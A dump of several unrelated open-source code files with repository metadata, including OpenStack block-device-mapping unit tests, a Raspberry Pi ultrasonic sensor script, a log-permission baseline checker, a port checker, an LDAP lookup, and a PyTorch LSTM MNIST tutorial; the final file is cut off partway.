repo_name (string, 5–92 chars) | path (string, 4–232 chars) | copies (19 distinct values) | size (string, 4–7 chars) | content (string, 721–1.04M chars) | license (15 distinct values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 15–997) | alpha_frac (float64, 0.25–0.97) | autogenerated (bool, 1 value) |
---|---|---|---|---|---|---|---|---|---|---|
tchakravarty/PythonExamples
|
Code/Miscellaneous/distribution_object_graph.py
|
1
|
1713
|
# ==============================================================================
# purpose: create statistical distribution objects, and find shortest paths
# author:
# created: 6/6/15
# revised:
# comments:
# 1. This is based on the object graph on Wikipedia.
# 2. The idea is to create a graph of the various continuous statistical distributions,
# plot them, and traverse the graph to find the shortest distance paths.
# 3. The Python module objgraph could be used for this, with the distributions as nodes,
#    but inheritance is the only relationship it captures, so it cannot express the
#    relationships we need, such as deterministic and approximate relationships.
# 4. How does an ontology fit into the picture?
#==============================================================================
import scipy.stats as sps
import math
class StatisticalDistribution(object):
def __init__(self):
pass
def compute_percentile(self, percentile):
pass
class NormalDistribution(StatisticalDistribution):
def __init__(self, mean=0, var=1):
self.mean = mean
self.var = var
def compute_percentile(self, percentile=0.5):
rv = sps.norm(loc=self.mean, scale=math.sqrt(self.var))
return rv.ppf(percentile)
class LogNormalDistribution(StatisticalDistribution):
def __init__(self, mean=0, var=1):
self.mean = mean
self.var = var
def compute_percentile(self, percentile=0.5):
rv = sps.lognorm(s=math.sqrt(self.var), scale=math.exp(self.mean))
return rv.ppf(percentile)
x = NormalDistribution(mean=3, var=4)
x.compute_percentile()
y = LogNormalDistribution(mean=3, var=4)
y.compute_percentile()
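# --- Hedged sketch (not part of the original file): one way to realise the
# object-graph idea from the header comments, assuming the third-party
# networkx package is available; node and edge labels here are illustrative.
import networkx as nx
dist_graph = nx.Graph()
# edges carry the kind of relationship between the two distributions
dist_graph.add_edge('normal', 'lognormal', relationship='deterministic (exp transform)')
dist_graph.add_edge('normal', 'student_t', relationship='approximate (df -> infinity)')
# traverse the graph for the shortest path, as described in comment 2 above
print(nx.shortest_path(dist_graph, 'lognormal', 'student_t'))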
|
apache-2.0
| 154,036,799,461,104,830 | 30.722222 | 96 | 0.640981 | false |
HybridF5/jacket
|
jacket/tests/compute/unit/api/openstack/compute/test_block_device_mapping_v1.py
|
1
|
17001
|
# Copyright (c) 2014 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mox3 import mox
from oslo_config import cfg
from oslo_serialization import jsonutils
from webob import exc
from jacket.api.compute.openstack.compute import block_device_mapping_v1 \
as block_device_mapping
from jacket.api.compute.openstack.compute import extension_info
from jacket.api.compute.openstack.compute.legacy_v2 import extensions
from jacket.api.compute.openstack.compute.legacy_v2 import servers as servers_v2
from jacket.api.compute.openstack.compute import servers as servers_v21
from jacket.compute.cloud import api as compute_api
from jacket.db import compute
from jacket.compute import exception
from jacket.compute import test
from jacket.tests.compute.unit.api.openstack import fakes
from jacket.tests.compute.unit.image import fake
CONF = cfg.CONF
class BlockDeviceMappingTestV21(test.TestCase):
validation_error = exception.ValidationError
def _setup_controller(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist', 'os-block-device-mapping',
'osapi_v21')
self.controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist',
['os-block-device-mapping-v1',
'os-block-device-mapping'],
'osapi_v21')
self.no_volumes_controller = servers_v21.ServersController(
extension_info=ext_info)
CONF.set_override('extensions_blacklist', '', 'osapi_v21')
def setUp(self):
super(BlockDeviceMappingTestV21, self).setUp()
self._setup_controller()
fake.stub_out_image_service(self)
self.volume_id = fakes.FAKE_UUID
self.bdm = [{
'no_device': None,
'virtual_name': 'root',
'volume_id': self.volume_id,
'device_name': 'vda',
'delete_on_termination': False
}]
def _get_servers_body(self, no_image=False):
body = {
'server': {
'name': 'server_test',
'imageRef': '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6',
'flavorRef': 'http://localhost/123/flavors/3',
'metadata': {
'hello': 'world',
'open': 'stack',
},
},
}
if no_image:
del body['server']['imageRef']
return body
def _test_create(self, params, no_image=False, override_controller=None):
body = self._get_servers_body(no_image)
body['server'].update(params)
req = fakes.HTTPRequest.blank('/v2/fake/servers')
req.method = 'POST'
req.headers['content-type'] = 'application/json'
req.body = jsonutils.dump_as_bytes(body)
if override_controller:
override_controller.create(req, body=body).obj['server']
else:
self.controller.create(req, body=body).obj['server']
def test_create_instance_with_volumes_enabled(self):
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm', _validate_bdm)
self._test_create(params)
def test_create_instance_with_volumes_enabled_and_bdms_no_image(self):
"""Test that the create works if there is no image supplied but
os-volumes extension is enabled and bdms are supplied
"""
self.mox.StubOutWithMock(compute_api.API, '_validate_bdm')
self.mox.StubOutWithMock(compute_api.API, '_get_bdm_image_metadata')
volume = {
'id': 1,
'status': 'active',
'volume_image_metadata':
{'test_key': 'test_value'}
}
compute_api.API._validate_bdm(mox.IgnoreArg(),
mox.IgnoreArg(), mox.IgnoreArg(),
mox.IgnoreArg()).AndReturn(True)
compute_api.API._get_bdm_image_metadata(mox.IgnoreArg(),
self.bdm,
True).AndReturn(volume)
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
self.assertNotIn('imageRef', kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.mox.ReplayAll()
self._test_create(params, no_image=True)
def test_create_instance_with_volumes_disabled(self):
bdm = [{'device_name': 'foo'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertNotIn(block_device_mapping, kwargs)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create(params,
override_controller=self.no_volumes_controller)
@mock.patch('compute.compute.api.API._get_bdm_image_metadata')
def test_create_instance_non_bootable_volume_fails(self, fake_bdm_meta):
bdm = [{
'volume_id': self.volume_id,
'device_name': 'vda'
}]
params = {'block_device_mapping': bdm}
fake_bdm_meta.side_effect = exception.InvalidBDMVolumeNotBootable(id=1)
self.assertRaises(exc.HTTPBadRequest,
self._test_create, params, no_image=True)
def test_create_instance_with_device_name_not_string(self):
self.bdm[0]['device_name'] = 123
old_create = compute_api.API.create
self.params = {'block_device_mapping': self.bdm}
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, self.params)
def test_create_instance_with_snapshot_volume_id_none(self):
old_create = compute_api.API.create
bdm = [{
'no_device': None,
'snapshot_id': None,
'volume_id': None,
'device_name': 'vda',
'delete_on_termination': False
}]
self.params = {'block_device_mapping': bdm}
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, self.params)
@mock.patch.object(compute_api.API, 'create')
def test_create_instance_with_bdm_param_not_list(self, mock_create):
self.params = {'block_device_mapping': '/dev/vdb'}
self.assertRaises(self.validation_error,
self._test_create, self.params)
def test_create_instance_with_device_name_empty(self):
self.bdm[0]['device_name'] = ''
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_device_name_too_long(self):
self.bdm[0]['device_name'] = 'a' * 256,
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_space_in_device_name(self):
self.bdm[0]['device_name'] = 'vd a',
params = {'block_device_mapping': self.bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertTrue(kwargs['legacy_bdm'])
self.assertEqual(kwargs['block_device_mapping'], self.bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def _test_create_instance_with_size_error(self, size):
bdm = [{'delete_on_termination': True,
'device_name': 'vda',
'volume_size': size,
'volume_id': '11111111-1111-1111-1111-111111111111'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(kwargs['block_device_mapping'], bdm)
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self.assertRaises(self.validation_error,
self._test_create, params)
def test_create_instance_with_invalid_size(self):
self._test_create_instance_with_size_error("hello world")
def test_create_instance_with_size_empty_string(self):
self._test_create_instance_with_size_error('')
def test_create_instance_with_size_zero(self):
self._test_create_instance_with_size_error("0")
def test_create_instance_with_size_greater_than_limit(self):
self._test_create_instance_with_size_error(compute.MAX_INT + 1)
def test_create_instance_with_bdm_delete_on_termination(self):
bdm = [{'device_name': 'foo1', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 'True'},
{'device_name': 'foo2', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo3', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 'invalid'},
{'device_name': 'foo4', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo5', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False}]
expected_bdm = [
{'device_name': 'foo1', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo2', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True},
{'device_name': 'foo3', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo4', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False},
{'device_name': 'foo5', 'volume_id': fakes.FAKE_UUID,
'delete_on_termination': False}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertEqual(expected_bdm, kwargs['block_device_mapping'])
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm', _validate_bdm)
self._test_create(params)
def test_create_instance_decide_format_legacy(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist',
['os-block-device-mapping',
'os-block-device-mapping-v1'],
'osapi_v21')
controller = servers_v21.ServersController(extension_info=ext_info)
bdm = [{'device_name': 'foo1',
'volume_id': fakes.FAKE_UUID,
'delete_on_termination': True}]
expected_legacy_flag = True
old_create = compute_api.API.create
def create(*args, **kwargs):
legacy_bdm = kwargs.get('legacy_bdm', True)
self.assertEqual(legacy_bdm, expected_legacy_flag)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm',
_validate_bdm)
self._test_create({}, override_controller=controller)
params = {'block_device_mapping': bdm}
self._test_create(params, override_controller=controller)
def test_create_instance_both_bdm_formats(self):
ext_info = extension_info.LoadedExtensionInfo()
CONF.set_override('extensions_blacklist', '', 'osapi_v21')
both_controllers = servers_v21.ServersController(
extension_info=ext_info)
bdm = [{'device_name': 'foo'}]
bdm_v2 = [{'source_type': 'volume',
'uuid': 'fake_vol'}]
params = {'block_device_mapping': bdm,
'block_device_mapping_v2': bdm_v2}
self.assertRaises(exc.HTTPBadRequest, self._test_create, params,
override_controller=both_controllers)
class BlockDeviceMappingTestV2(BlockDeviceMappingTestV21):
validation_error = exc.HTTPBadRequest
def _setup_controller(self):
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {'os-volumes': 'fake'}
self.controller = servers_v2.Controller(self.ext_mgr)
self.ext_mgr_no_vols = extensions.ExtensionManager()
self.ext_mgr_no_vols.extensions = {}
self.no_volumes_controller = servers_v2.Controller(
self.ext_mgr_no_vols)
def test_create_instance_with_volumes_disabled(self):
bdm = [{'device_name': 'foo'}]
params = {'block_device_mapping': bdm}
old_create = compute_api.API.create
def create(*args, **kwargs):
self.assertIsNone(kwargs['block_device_mapping'])
return old_create(*args, **kwargs)
self.stubs.Set(compute_api.API, 'create', create)
self._test_create(params,
override_controller=self.no_volumes_controller)
def test_create_instance_decide_format_legacy(self):
ext_mgr = extensions.ExtensionManager()
ext_mgr.extensions = {'os-volumes': 'fake',
'os-block-device-mapping-v2-boot': 'fake'}
controller = servers_v2.Controller(self.ext_mgr)
bdm = [{'device_name': 'foo1',
'volume_id': fakes.FAKE_UUID,
'delete_on_termination': 1}]
expected_legacy_flag = True
old_create = compute_api.API.create
def create(*args, **kwargs):
legacy_bdm = kwargs.get('legacy_bdm', True)
self.assertEqual(legacy_bdm, expected_legacy_flag)
return old_create(*args, **kwargs)
def _validate_bdm(*args, **kwargs):
pass
self.stubs.Set(compute_api.API, 'create', create)
self.stubs.Set(compute_api.API, '_validate_bdm',
_validate_bdm)
self._test_create({}, override_controller=controller)
params = {'block_device_mapping': bdm}
self._test_create(params, override_controller=controller)
def test_create_instance_with_size_empty_string(self):
# Add a check whether the size is an empty string
# in V2.1 API only. So this test is skipped in V2.0 API
pass
def test_create_instance_with_size_zero(self):
# Add a check whether the size is zero in V2.1 API only.
# So this test is skipped in V2.0 API
pass
def test_create_instance_with_size_greater_than_limit(self):
# Add a check whether size is greater than the limit
# in V2.1 API only. So this test is skipped in V2.0 API
pass
|
apache-2.0
| -7,537,596,891,134,087,000 | 39.096698 | 80 | 0.593553 | false |
cormoran/RaspberryPi
|
tests/Others/ultrasonicsensor.py
|
1
|
3633
|
#!/usr/bin/python
import time
import RPi.GPIO as GPIO
# remember to change the GPIO values below to match your sensors
# GPIO output = the pin that's connected to "Trig" on the sensor
# GPIO input = the pin that's connected to "Echo" on the sensor
def reading(sensor):
# Disable any warning message such as GPIO pins in use
GPIO.setwarnings(False)
# use the values of the GPIO pins, and not the actual pin number
# so if you connect to GPIO 25 which is on pin number 22, the
# reference in this code is 25, which is the number of the GPIO
# port and not the number of the physical pin
GPIO.setmode(GPIO.BCM)
if sensor == 0:
# point the software to the GPIO pins the sensor is using
# change these values to the pins you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
# GPIO input = the pin that's connected to "Echo" on the sensor
GPIO.setup(17,GPIO.OUT)
GPIO.setup(27,GPIO.IN)
GPIO.output(17, GPIO.LOW)
# found that the sensor can crash if there isn't a delay here
# no idea why. If you have odd crashing issues, increase delay
time.sleep(0.3)
# the sensor manual says a pulse length of 10us will trigger the
# sensor to transmit 8 cycles of ultrasonic burst at 40kHz and
# wait for the reflected ultrasonic burst to be received.
# to get a pulse length of 10us we need to start the pulse, then
# wait for 10 microseconds, then stop the pulse. This will
# result in the pulse length being 10us.
# start the pulse on the GPIO pin
# change this value to the pin you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
GPIO.output(17, True)
# wait 10 microseconds (this is 0.00001 seconds) so the pulse
# length is 10us as the sensor expects
time.sleep(0.00001)
# stop the pulse after the time above has passed
# change this value to the pin you are using
# GPIO output = the pin that's connected to "Trig" on the sensor
GPIO.output(17, False)
# listen to the input pin. 0 means nothing is happening. Once a
# signal is received the value will be 1 so the while loop
# stops and has the last recorded time the signal was 0
# change this value to the pin you are using
# GPIO input = the pin that's connected to "Echo" on the sensor
while GPIO.input(27) == 0:
signaloff = time.time()
# listen to the input pin. Once a signal is received, record the
# time the signal came through
# change this value to the pin you are using
# GPIO input = the pin that's connected to "Echo" on the sensor
while GPIO.input(27) == 1:
signalon = time.time()
# work out the difference in the two recorded times above to
# calculate the distance of an object in front of the sensor
timepassed = signalon - signaloff
# we now have the round-trip time, but not in a useful unit of
# measurement. sound travels at roughly 34300 cm/s, and halving
# that for the round trip gives the factor of ~17000 that
# converts the elapsed time into centimetres
distance = timepassed * 17000
# we're no longer using the GPIO, so tell the software we're done
# (this must happen before the return, or it would never run)
GPIO.cleanup()
# return the distance of an object in front of the sensor in cm
return distance
else:
print "Incorrect usonic() function varible."
while 1:
print reading(0)
time.sleep(0.5)
|
gpl-2.0
| -2,685,730,067,043,373,600 | 39.366667 | 72 | 0.629783 | false |
smarttang/baseline_testing
|
plugins/t_varfile_mod.py
|
1
|
1129
|
#coding:utf-8
import re
import os  # needed for the os.path.exists() check below
import commands
###################################
#
# Check whether the system log files have had their permissions restricted
#
####################################
class TvarfileMod:
global results,sorce
results=[]
sorce=60
def setBaseline_main(self,baseline_main):
self.baseline_main=baseline_main
def start(self):
# declare the module-level names so sorce can be reassigned below
global results, sorce
print "[*] Checking TvarfileMod!!"
check_list=['/var/log/message','/var/log/secure','/var/log/maillog','/var/log/cron','/var/log/spooler','/var/log/boot.log']
try:
for item in check_list:
if os.path.exists(item):
test_com=commands.getoutput("ls -l "+item).split(" ")
if not test_com[0]=="-rw-r-----":
sorce=sorce-10
results.append({item:test_com[0]})
except:
pass
# print self.baseline_main.output_name
def save(self):
if sorce<60:
self.baseline_main.xml_result({"mod_id":"37wan-centOS-06","mod_name":"TvarfileMod","status":"1","results":str(results)})
else:
self.baseline_main.xml_result({"mod_id":"37wan-centOS-06","mod_name":"TvarfileMod","status":"0","results":"null"})
print "[*] TvarfileMod Finish!"
def getPluginClass():
return TvarfileMod
|
gpl-2.0
| 6,226,643,696,517,116,000 | 26.525 | 125 | 0.624886 | false |
nims11/hostapd.py
|
config_hostapd.py
|
1
|
1849
|
#!/usr/bin/env python2.7
from common_methods import exit_script, display_usage, exit_error
import sys, os
import config
import config_gen
def generate_confs():
"""
For each section, generate a config file into OUTPUT_CONFIG if TEMPLATE_CONFIG is present.
HOSTAPD is the exception, as it may have many variables that are not intended to be
specified through TEMPLATE_CONFIG; it is written out directly instead.
"""
global_config = config_gen.get_config()
for section in global_config.keys():
if global_config[section].has_key('TEMPLATE_CONFIG'):
if not global_config[section].has_key('OUTPUT_CONFIG'):
exit_error("[ERROR] 'OUTPUT_CONFIG' not specified for '" + section + "'")
template_file = global_config[section]['TEMPLATE_CONFIG']
template_str = ''
try:
with open(template_file) as f:
template_str = f.read()
except:
exit_error("[ERROR] Template File for '" + section + "', " + template_file + " does not exist")
for key, val in global_config[section].items():
template_str = template_str.replace('$' + key + '$', val)
try:
with open(global_config[section]['OUTPUT_CONFIG'], 'wb') as f:
print 'Writing', f.name, '...'
f.write(template_str)
except:
exit_error("[ERROR] Failed to open output_config '" + global_config[section]['OUTPUT_CONFIG'] + "' in write mode")
elif section == 'HOSTAPD':
write_hostapd_conf(global_config)
def write_hostapd_conf(global_config):
config_output = global_config['HOSTAPD']['OUTPUT_CONFIG']
print 'Writing', config_output, '...'
try:
with open(config_output, 'w') as f:
for key, val in global_config['HOSTAPD'].items():
if key not in config.special_options:
f.write( key + '=' + val + '\n' )
except:
exit_error('[ERROR] Failed to open ' + config_output + ' in write mode')
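# --- Hedged sketch (not part of the original file): the $KEY$ substitution
# loop from generate_confs() pulled out as a standalone helper; the template
# text and values in the usage comment are made-up examples.
def render_template(template_str, section_config):
    for key, val in section_config.items():
        template_str = template_str.replace('$' + key + '$', val)
    return template_str
# e.g. render_template('interface=$IFACE$', {'IFACE': 'wlan0'}) -> 'interface=wlan0'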
def test():
config_gen.init()
generate_confs()
if __name__ == '__main__':
test()
|
mit
| 3,153,232,477,062,764,000 | 35.254902 | 118 | 0.667929 | false |
apple/swift-lldb
|
packages/Python/lldbsuite/test/lang/swift/metatype/TestSwiftMetatype.py
|
1
|
1815
|
# TestSwiftMetatype.py
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2016 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ------------------------------------------------------------------------------
"""
Test the formatting of Swift metatypes
"""
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
import lldbsuite.test.lldbutil as lldbutil
import os
import unittest2
class TestSwiftMetatype(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@swiftTest
def test_metatype(self):
"""Test the formatting of Swift metatypes"""
self.build()
target, process, thread, bkpt = lldbutil.run_to_source_breakpoint(
self, 'Set breakpoint here', lldb.SBFileSpec('main.swift'))
frame = thread.frames[0]
self.assertTrue(frame, "Frame 0 is valid.")
var_s = frame.FindVariable("s")
var_c = frame.FindVariable("c")
var_f = frame.FindVariable("f")
var_t = frame.FindVariable("t")
var_p = frame.FindVariable("p")
lldbutil.check_variable(self, var_s, False, "String")
lldbutil.check_variable(self, var_c, False, "a.D")
lldbutil.check_variable(self, var_f, False, "(Int) -> Int")
lldbutil.check_variable(self, var_t, False, "(Int, Int, String)")
lldbutil.check_variable(self, var_p, False, "a.P")
if __name__ == '__main__':
import atexit
lldb.SBDebugger.Initialize()
atexit.register(lldb.SBDebugger.Terminate)
unittest2.main()
|
apache-2.0
| -4,033,874,331,155,257,000 | 32 | 80 | 0.639118 | false |
JoseTomasTocino/SiteUp
|
web/siteup_checker/monitoring/pport.py
|
1
|
1113
|
import socket
import logging
logger = logging.getLogger("debugging")
def check_port(host, port_number, content=None):
logger.info(u"Port check, host: %s, port: %s, content: '%s'" % (host, port_number, content))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
# connect_ex returns an error number instead of raising an exception... in theory
try:
result = s.connect_ex((host, port_number))
except Exception as e:
logger.error(u"Error: %s" % e)
return {'valid': False}
logger.info(u"Port check, connection errno: %i" % result)
if result == 0:
ret_obj = {'status_ok': True, 'valid': True}
if content:
try:
recv_content = s.recv(512)
except Exception as e:
logger.error(u"Error: %s" % e)
return {'valid': False}
logger.info(u"Received: %s" % recv_content)
if content.lower() not in recv_content.lower():
ret_obj['status_ok'] = False
return ret_obj
else:
return {'valid': False}
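# --- Hedged sketch (not part of the original file): example call with a
# made-up host, checking an SMTP banner for its usual '220' greeting.
if __name__ == '__main__':
    result = check_port('mail.example.com', 25, content='220')
    logger.info(u"check_port result: %s" % result)  # e.g. {'status_ok': True, 'valid': True}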
|
gpl-2.0
| -2,188,741,097,909,394,000 | 26.825 | 96 | 0.57053 | false |
JudgeGregg/Redmine-Importer
|
redmine_ldap.py
|
1
|
1337
|
#-*- encoding: utf8 -*-
"""Retrieve user id from ldap server."""
import logging
import sys
logging.basicConfig(level=logging.INFO)
LOGGER = logging.getLogger(__name__)
try:
import ldap
except ImportError, exception:
LOGGER.error(str(exception))
sys.exit()
LDAP_SERVER_URL = 'ldap://directory.lvl.intranet'
LDAP_QUERY = 'uid={},ou=smile,ou=users,dc=smile,dc=fr'
def get_user_id_from_ldap(pentagram, ldap_url=LDAP_SERVER_URL,
ldap_query=LDAP_QUERY):
"""Get user id from pentagram.
:param pentagram: string
:returns: user_id: string
"""
if not len(pentagram) == 5:
LOGGER.error('Invalid user name, skipping...')
return None
try:
ldap_server = ldap.initialize(ldap_url)
ldap_server.simple_bind()
except ldap.LDAPError:
LOGGER.error('Error while connecting to LDAP server, skipping...')
return None
try:
results = ldap_server.search_s(
ldap_query.format(pentagram), ldap.SCOPE_SUBTREE,
attrlist=['uidNumber'])
except ldap.NO_SUCH_OBJECT:
LOGGER.error('No match found, skipping...')
return None
if not len(results) == 1:
LOGGER.error('Too many users matching, skipping...')
return None
_, arr = results[0]
return arr['uidNumber'][0]
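# --- Hedged sketch (not part of the original file): example lookup with a
# made-up five-character identifier, which is what "pentagram" refers to above.
if __name__ == '__main__':
    uid = get_user_id_from_ldap('abcde')
    if uid is not None:
        LOGGER.info('Resolved uidNumber: %s', uid)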
|
gpl-3.0
| -7,550,749,679,225,353,000 | 27.446809 | 74 | 0.624533 | false |
yunjey/pytorch-tutorial
|
tutorials/02-intermediate/recurrent_neural_network/main.py
|
1
|
3536
|
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
# Device configuration
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
# Hyper-parameters
sequence_length = 28
input_size = 28
hidden_size = 128
num_layers = 2
num_classes = 10
batch_size = 100
num_epochs = 2
learning_rate = 0.01
# MNIST dataset
train_dataset = torchvision.datasets.MNIST(root='../../data/',
train=True,
transform=transforms.ToTensor(),
download=True)
test_dataset = torchvision.datasets.MNIST(root='../../data/',
train=False,
transform=transforms.ToTensor())
# Data loader
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=batch_size,
shuffle=True)
test_loader = torch.utils.data.DataLoader(dataset=test_dataset,
batch_size=batch_size,
shuffle=False)
# Recurrent neural network (many-to-one)
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, num_layers, num_classes):
super(RNN, self).__init__()
self.hidden_size = hidden_size
self.num_layers = num_layers
self.lstm = nn.LSTM(input_size, hidden_size, num_layers, batch_first=True)
self.fc = nn.Linear(hidden_size, num_classes)
def forward(self, x):
# Set initial hidden and cell states
h0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)
c0 = torch.zeros(self.num_layers, x.size(0), self.hidden_size).to(device)
# Forward propagate LSTM
out, _ = self.lstm(x, (h0, c0)) # out: tensor of shape (batch_size, seq_length, hidden_size)
# Decode the hidden state of the last time step
out = self.fc(out[:, -1, :])
return out
model = RNN(input_size, hidden_size, num_layers, num_classes).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model
total_step = len(train_loader)
for epoch in range(num_epochs):
for i, (images, labels) in enumerate(train_loader):
images = images.reshape(-1, sequence_length, input_size).to(device)
labels = labels.to(device)
# Forward pass
outputs = model(images)
loss = criterion(outputs, labels)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i+1) % 100 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
# Test the model
model.eval()
with torch.no_grad():
correct = 0
total = 0
for images, labels in test_loader:
images = images.reshape(-1, sequence_length, input_size).to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Test Accuracy of the model on the 10000 test images: {} %'.format(100 * correct / total))
# Save the model checkpoint
torch.save(model.state_dict(), 'model.ckpt')
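# --- Hedged sketch (not part of the original file): reloading the checkpoint
# saved above into a fresh model instance for later inference.
restored = RNN(input_size, hidden_size, num_layers, num_classes).to(device)
restored.load_state_dict(torch.load('model.ckpt'))
restored.eval()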
|
mit
| -4,303,049,334,710,658,000 | 33.339806 | 101 | 0.573247 | false |
lopiola/cowboys_ai
|
src/supervised_learning/network.py
|
1
|
2137
|
#!/usr/bin/env python
# coding=utf-8
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised.trainers import BackpropTrainer
from src.supervised_learning import dataset
from math import sqrt
import cPickle as pickle
def build(input_size, hidden_size, target_size):
return buildNetwork(input_size, hidden_size, target_size, bias=True)
def train(network, dataset, epochs):
trainer = BackpropTrainer(network, dataset)
# trainer.trainUntilConvergence(verbose=True)
#
for i in range(epochs):
mse = trainer.train()
rmse = sqrt(mse)
print "training RMSE, epoch {}: {}".format(i + 1, rmse)
def load_from_file(filename):
network = None
with open(filename, 'r') as pickle_file:
network = pickle.load(pickle_file)
return network
def save_to_file(filename, network):
pickle.dump(network, open(filename, 'wb'))
def train_and_save(input_size,
output_size,
hidden_size,
training_epochs,
network_filename,
dataset_filename):
network = build(input_size, hidden_size, output_size)
ds = dataset.load_from_file(dataset_filename)
train(network, ds, training_epochs)
save_to_file(network_filename, network)
def rnd_config():
return {
"network_filename": "network/rnd_net.pickle",
"dataset_filename": "datasets/rnd.data",
}
def best_avg_config():
return {
"network_filename": "network/best_avg_net.pickle",
"dataset_filename": "datasets/best_avg.data",
}
def thinking_config():
return {
"network_filename": "network/thinking_net.pickle",
"dataset_filename": "datasets/thinking.data",
}
def mixed_config():
return {
"network_filename": "network/mixed_net.pickle",
"dataset_filename": "datasets/mixed.data",
}
if __name__ == '__main__':
input_size = 9
output_size = 1
hidden_size = 15
training_epochs = 200
train_and_save(
input_size,
output_size,
hidden_size,
training_epochs,
**mixed_config())
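# --- Hedged sketch (not part of the original file): evaluating a previously
# saved network on one observation; a 9-element input matches the input_size
# used above.
def predict(network_filename, observation):
    network = load_from_file(network_filename)
    return network.activate(observation)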
|
mit
| 3,967,700,485,640,788,000 | 26.050633 | 72 | 0.627515 | false |
stereoboy/object_detection
|
utils.py
|
1
|
1635
|
import tensorflow as tf
import numpy as np
from PIL import Image
from six.moves import urllib  # needed by maybe_download's urlretrieve call
import os
def maybe_download(directory, filename, url):
print('Trying to download', url)
if not tf.gfile.Exists(directory):
tf.gfile.MakeDirs(directory)
filepath = os.path.join(directory, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(url, filepath)
